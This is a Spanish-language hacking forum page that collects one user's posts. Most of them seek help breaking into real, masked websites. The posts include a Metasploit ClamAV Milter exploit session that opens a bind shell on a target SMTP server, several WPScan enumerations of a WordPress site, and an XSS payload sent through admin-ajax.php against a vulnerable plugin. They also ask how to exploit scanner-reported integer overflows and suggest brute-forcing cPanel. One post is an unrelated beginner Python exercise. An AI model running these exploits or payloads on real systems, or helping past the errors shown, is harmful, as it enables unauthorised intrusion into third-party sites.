Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - krraskl13

#1
Si he probado con los demas payloads y me sigue dando el mismo error.
#2
Hola hermano, en primer lugar gracias por contestar.
Tienes razón, deberia haberme asegurado de que el servidor usa ClamAv. Pero no he encotrado informacion al respecto en google. Y una pregunta, ¿si abre sesión es porque es vulnerable?
O puede abrir sesión sin usar ClamAv, nose si me entiendes. Yo pensaba que como abre una sesión en msf era vulnerable, usaba ClamAv y que lo que fallaba era el payload que utilizaba. Por eso daba este error, Reason: Died from Errno::ECONNRESET.

Un Saludo.  ;D
#3
He estado haciendo una auditoria a una web y viendo los puertos abiertos localice que tenia el puerto 25 (SMTP), busque un exploit para intentar explotarlo en msf:

msf > search smtp

Matching Modules
================

   Name                                                    Disclosure Date          Rank       Description
   ----                                                    ---------------          ----       -----------
   auxiliary/client/smtp/emailer                                                    normal     Generic Emailer (SMTP)
   auxiliary/dos/smtp/sendmail_prescan                     2003-09-17 00:00:00 UTC  normal     Sendmail SMTP Address prescan <= 8.12.8 Memory Corruption
   auxiliary/dos/windows/smtp/ms06_019_exchange            2004-11-12 00:00:00 UTC  normal     MS06-019 Exchange MODPROP Heap Overflow
   auxiliary/fuzzers/smtp/smtp_fuzzer                                               normal     SMTP Simple Fuzzer
   auxiliary/scanner/smtp/smtp_enum                                                 normal     SMTP User Enumeration Utility
   auxiliary/scanner/smtp/smtp_version                                              normal     SMTP Banner Grabber
   auxiliary/server/capture/smtp                                                    normal     Authentication Capture: SMTP
   auxiliary/vsploit/pii/email_pii                                                  normal     VSploit Email PII
   exploit/unix/smtp/clamav_milter_blackhole               2007-08-24 00:00:00 UTC  excellent  ClamAV Milter Blackhole-Mode Remote Code Execution
   exploit/unix/smtp/exim4_string_format                   2010-12-07 00:00:00 UTC  excellent  Exim4 <= 4.69 string_format Function Heap Buffer Overflow
   exploit/unix/webapp/squirrelmail_pgp_plugin             2007-07-09 00:00:00 UTC  manual     SquirrelMail PGP Plugin command execution (SMTP)
   exploit/windows/browser/communicrypt_mail_activex       2010-05-19 00:00:00 UTC  great      CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow
   exploit/windows/browser/oracle_dc_submittoexpress       2009-08-28 00:00:00 UTC  normal     Oracle Document Capture 10g ActiveX Control Buffer Overflow
   exploit/windows/email/ms07_017_ani_loadimage_chunksize  2007-03-28 00:00:00 UTC  great      Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
   exploit/windows/http/mdaemon_worldclient_form2raw       2003-12-29 00:00:00 UTC  great      MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow
   exploit/windows/smtp/mailcarrier_smtp_ehlo              2004-10-26 00:00:00 UTC  good       TABS MailCarrier v2.51 SMTP EHLO Overflow
   exploit/windows/smtp/mercury_cram_md5                   2007-08-18 00:00:00 UTC  great      Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
   exploit/windows/smtp/ms03_046_exchange2000_xexch50      2003-10-15 00:00:00 UTC  good       MS03-046 Exchange 2000 XEXCH50 Heap Overflow
   exploit/windows/smtp/njstar_smtp_bof                    2011-10-31 00:00:00 UTC  normal     NJStar Communicator 3.00 MiniSMTP Buffer Overflow
   exploit/windows/smtp/wmailserver                        2005-07-11 00:00:00 UTC  average    SoftiaCom WMailserver 1.0 Buffer Overflow
   exploit/windows/smtp/ypops_overflow1                    2004-09-27 00:00:00 UTC  average    YPOPS 0.6 Buffer Overflow
   exploit/windows/ssl/ms04_011_pct                        2004-04-13 00:00:00 UTC  average    Microsoft Private Communications Transport Overflow
   post/windows/gather/credentials/outlook                                          normal     Windows Gather Microsoft Outlook Saved Password Extraction

Finalmente use un exploit que utiliza una vulnerabilidad de ClamAV Milter Blackhole-Mode Remote Code Execution.

msf > use exploit/unix/smtp/clamav_milter_blackhole
msf  exploit(clamav_milter_blackhole) > show options

Module options (exploit/unix/smtp/clamav_milter_blackhole):

   Name      Current Setting    Required  Description
   ----      ---------------    --------  -----------
   MAILFROM  [email protected]  yes       FROM address of the e-mail
   MAILTO    nobody@localhost   yes       TO address of the e-mail
   RHOST                        yes       The target address
   RPORT     25                 yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(clamav_milter_blackhole) > set RHOST x.x.x.x
RHOST => x.x.x.x

msf  exploit(clamav_milter_blackhole) > show payloads

Compatible Payloads
===================

   Name                                Disclosure Date  Rank    Description
   ----                                ---------------  ----    -----------
   cmd/unix/bind_perl                                   normal  Unix Command Shell, Bind TCP (via Perl)
   cmd/unix/bind_perl_ipv6                              normal  Unix Command Shell, Bind TCP (via perl) IPv6
   cmd/unix/bind_ruby                                   normal  Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/bind_ruby_ipv6                              normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
   cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
   cmd/unix/reverse                                     normal  Unix Command Shell, Double reverse TCP (telnet)
   cmd/unix/reverse_perl                                normal  Unix Command Shell, Reverse TCP (via Perl)
   cmd/unix/reverse_perl_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via perl)
   cmd/unix/reverse_ruby                                normal  Unix Command Shell, Reverse TCP (via Ruby)
   cmd/unix/reverse_ruby_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via Ruby)
   cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double reverse TCP SSL (telnet)

msf  exploit(clamav_milter_blackhole) > set payload cmd/unix/bind_ruby
payload => cmd/unix/bind_ruby
msf  exploit(clamav_milter_blackhole) > show options

Module options (exploit/unix/smtp/clamav_milter_blackhole):

   Name      Current Setting    Required  Description
   ----      ---------------    --------  -----------
   MAILFROM  [email protected]  yes       FROM address of the e-mail
   MAILTO    nobody@localhost   yes       TO address of the e-mail
   RHOST     x.x.x.x          yes       The target address
   RPORT     25                 yes       The target port


Payload options (cmd/unix/bind_ruby):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  x.x.x.x           no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(clamav_milter_blackhole) > exploit

  • Started bind handler
  • Command shell session 1 opened (192.168.229.130:59441 -> x.x.x.x:4444) at 2014-02-15 14:44:08 -0500


    daemon
    [Aqui sale una codificacion extraña]

  • x.x.x.x - Command shell session 1 closed.  Reason: Died from Errno::ECONNRESET

    Creo que lo configuro todo bien pero me sigue dando este error.. He probado con diferentes payloads y con todo sucede lo mismo.
    ¿Alguien puede ayudarme?
#4
Talleres Underc0de / Re:Taller de Python #2
Agosto 08, 2013, 07:28:38 PM
Muy bueno el tuto. Lo he estudiado a fondo tanto éste como el anterior y e hecho este programita que comprueba múltiplos, para así comprobar que sabia utilizar las estructuras de control if, elif, else, for y while. Espero una tercera entrega para poder aprender más.

Código: python


Datos = raw_input("Inserte usuario: ")
print "Bienvenido " + Datos
print "Inserte 'Comprobar' para comprobar si un numero es multiplo de otro."
print "Inserte 'Multiplos' para conocer los 10 primeros multiplos de un numero."
Menu = raw_input("Inserte la palabra que desee: ")
if Menu=="Comprobar":
Multiplo = input("Ingrese el numero para comprobar sus multiplos: ")
Numero = input("Ingrese un numero para comprobar si es multiplo de " + str(Multiplo) + ": ")

if Numero%Multiplo==0:
print "Su numero es multiplo de " + str(Multiplo)
else :
print "Su numero no es multiplo de " + str(Multiplo)

elif Menu =="Multiplos":
#Escribir primeros 10 multiplos
Numero = input("Inserte el numero del que desea conocer sus primeros 10 multiplos: ")
for i in range(11):
print Numero*i

else:
print "Usted ha escrito: " + Menu


while True:
Aux=raw_input("Inserte 'Salir':")
if Aux=="Salir":
print "Adios " + Datos
break
else :
print "Usted ha escrito: " + Aux


Un Saludo, Krraskl13. 8)
#5
Dudas y pedidos generales / Re:Integer Overflow
Enero 26, 2013, 04:46:43 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Haciendo un scanner? Wtf?! Scanner es el programa con el que haces SCANNING.

Y, me parece a mi, o tienes informaciones en Vega cuando el SCANNER encuentra una vulnerabilidad IntegerOverflow?

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Si haciendo un Scanner de vulnerabilidades con Vegas, y la informacion ofrecida por el programa no la entendia para explotarla ya me ha dado un buen empujon CalebBucker, con lo de explotacion a traves de SqlMap.
#6
Dudas y pedidos generales / Re:Integer Overflow
Enero 26, 2013, 08:47:07 AM
Muchas Gracias!!;)
#7
Dudas y pedidos generales / Integer Overflow
Enero 25, 2013, 09:02:40 AM
Haciendo un scanner con Vegas de la distro Backtrack5 R3, a una web y me da 20 errores de Integer Overflow de riesgo alto. He buscado por google y por distintos foros, y solo encuentro vulnerabilidades de integer overflow en aplicaciones y eso pero nada de vulnerabilidades web.
Solo quiero informacion, o algun link por donde seguir buscando y aprender a explotar esa vulnerabilidad.

Saludos, Krraskl13.
#8
Wargames y retos / Re:Reto XSS [muy fácil]
Enero 18, 2013, 06:23:16 AM
Aprendiendo...  8)

#9
Espero estar haciendo algo mal.. Porque es la única vulnerabilidad que sale!!
Asi que no se que hacer..
#10
Tambien probe con  el Live Http Headers..  Que se me olvido comentarlo, cargue la pagina  http://www.*site*.com/wp-admin/admin-ajax.php en mozzilla y despues le di a repetir con el post:action=csp_po_dlg_new&name="><script>alert(1)</script>
Pero recargaba la pagina y seguia igual..
#11
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Primero que nada el Cross Site Scripting tiende a  usar como acrónimo  Xss no Css por otra parte como te podemos ayudar si no nos has proporcionado la URL.



Saludos,
Dedalo

Corregido!! Perdon por mi fallo.

Por otra parte queria decir que si he leido sobre XSS, solo que lo escribí mal y no me di cuenta.
El problema es que cuando abro  la direccion que me indica el exploit http://www.*site*.com/wp-admin/admin-ajax.php me sale una pagina en blanco con un 0 arriba a la izquierda. Y ahi no hay ningun buscador ni ningun formulario para hacer XSS.
Entonces lo he probado en la URL de esta forma http://www.*site*.com/wp-admin/admin-ajax.php?action=csp_po_dlg_new&name="><script>alert(1)</script>

Pero tampoco. Por eso he pedido ayuda.
#12
WPScan, mira esto es lo que me devuelve:

Código: php
root@bt:~/wpscan# ruby wpscan.rb --url http://www.*site*.com --enumerate vp
____________________________________________________
__          _______   _____                 
\ \        / /  __ \ / ____|                 
  \ \  /\  / /| |__) | (___   ___  __ _ _ __ 
   \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
    \  /\  /  | |     ____) | (__| (_| | | | |
     \/  \/   |_|    |_____/ \___|\__,_|_| |_| v2.0r2593a2e

    WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________

| URL: http://www.*site*.com/
| Started on Sat Jan 12 07:38:50 2013

[+] The WordPress theme in use is iblogpro v4.2.6
[!] The WordPress 'http://www.*site*.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.*site*.com/wp-includes/rss-functions.php'
[+] WordPress version 3.5 identified from meta generator

[!] We have identified 2 vulnerabilities from the version number :

| * Title: XMLRPC Pingback API Internal/External Port Scanning
| * Reference: https://github.com/FireFart/WordpressPingbackPortScanner

| * Title: WordPress XMLRPC pingback additional issues
| * Reference: http://lab.onsec.ru/2013/01/wordpress-xmlrpc-pingback-additional.html

[+] Enumerating installed plugins (only vulnerable ones) ...

Checking for 321 total plugins... 100% complete.

[+] We found 1 plugins:

| Name: codestyling-localization
| Location: http://www.*site*.com/wp-content/plugins/codestyling-localization/
| Directory listing enabled: Yes
| Readme: http://www.*site*.com/wp-content/plugins/codestyling-localization/readme.txt
|
| [!] Code Styling Localization <= 1.99.16 Cross Site Scripting
| * Reference: http://packetstormsecurity.org/files/112709/

[+] Finished at Sat Jan 12 07:39:39 2013
[+] Elapsed time: 00:00:48
#13
Hola, me sale una vulnerabilidad en un WordPress del plugin WordPress CodeStyling Localization 1.99.16, y el escaner me devuelve este exploit:

Código: php
http://packetstormsecurity.com/files/112709/


Pero no consigo lanzarlo.. Alguien me ayuda ??
#14
Acabo de actualizar el wpSCan y me ha dado dos vulnerabilidades por la version del WordPress 3.5, a ver si me podeis ayudar :

Código: php
[!] We have identified 2 vulnerabilities from the version number :

| * Title: XMLRPC Pingback API Internal/External Port Scanning
| * Reference: https://github.com/FireFart/WordpressPingbackPortScanner

| * Title: WordPress XMLRPC pingback additional issues
| * Reference: http://lab.onsec.ru/2013/01/wordpress-xmlrpc-pingback-additional.html


Me he instalado el wpps.rb pero no consigo llegar a nada.
#15
Alguna sugerencia ??

Brute force al Cpanel no queda otra no ??
#16
Despues de leer unos tutoriales, ya encontre mi fallo --wp-content-dir, necesita ir acompañado de algun path como el --enumerate.
He probado --enumerate vp, ap y p pero no se ha encontrado ningun plugin.

Código: php
root@bt:~/wpscan# ruby wpscan.rb --url www.*site*.com -f --wp-content-dir --enumerate vp
____________________________________________________
__          _______   _____                 
\ \        / /  __ \ / ____|                 
  \ \  /\  / /| |__) | (___   ___  __ _ _ __ 
   \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
    \  /\  /  | |     ____) | (__| (_| | | | |
     \/  \/   |_|    |_____/ \___|\__,_|_| |_| v2.0rcf102a0

    WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________

| URL: http://www.*site*.com/
| Started on Thu Jan 10 15:21:18 2013

[!] The WordPress 'http://www.*site*.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.*site*.com/wp-includes/rss-functions.php'
[+] XML-RPC Interface available under http://www.*site*.com/xmlrpc.php
[+] WordPress version 3.5 identified from advanced fingerprinting

[+] Enumerating plugins from passive detection ...
No plugins found :(

[+] Finished at Thu Jan 10 15:21:31 2013
[+] Elapsed time: 00:00:13



Sin embargo cuando hago la consulta:

Código: php
 ruby wpscan.rb --url www.*site*.com -f --wp-content-dir custom-content --enumerate vp


Me salen un monton de plugins, para explotar. Pero no se puede acceder a ninguno de ellos.. Y no consigo llevar a cabo ningun exploit.
#17
Ahora me salta otro error con -f

Código: php
____________________________________________________
__          _______   _____                 
\ \        / /  __ \ / ____|                 
  \ \  /\  / /| |__) | (___   ___  __ _ _ __ 
   \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
    \  /\  /  | |     ____) | (__| (_| | | | |
     \/  \/   |_|    |_____/ \___|\__,_|_| |_| v2.0rcf102a0

    WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________

[ERROR] The WordPress URL supplied 'http://www.*site*.com/' seems to be down.
Trace :
wpscan.rb:54:in `<main>'
#18
Ya tengo la ultima version y me vuelve a dar el mismo error :

Código: php
 __          _______   _____                  
\ \        / /  __ \ / ____|                 
  \ \  /\  / /| |__) | (___   ___  __ _ _ __ 
   \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
    \  /\  /  | |     ____) | (__| (_| | | | |
     \/  \/   |_|    |_____/ \___|\__,_|_| |_| v2.0rcf102a0

    WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________

[ERROR] The remote website is up, but does not seem to be running WordPress.
Trace :
wpscan.rb:83:in `<main>'
#19
Ya le pongo el pathname /wp-content/ pero sigue dando error :

Código: php
 
__          _______   _____                 
\ \        / /  __ \ / ____|                 
  \ \  /\  / /| |__) | (___   ___  __ _ _ __ 
   \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
    \  /\  /  | |     ____) | (__| (_| | | | |
     \/  \/   |_|    |_____/ \___|\__,_|_| |_| v1.1r425

    WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________

[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan

The remote host tried to redirect us to http://www.*site*.com/wp-content/
Do you want follow the redirection ? [y/n]
y
[ERROR] The remote website is up, but does not seem to be running WordPress.
Trace : ["wpscan.rb:79:in `<main>'"]
#20
Acabo de pasarle el wpscan y me sale esto..

Código: php
[ERROR] The wp_content_dir has not been found, please supply it with --wp-content-dir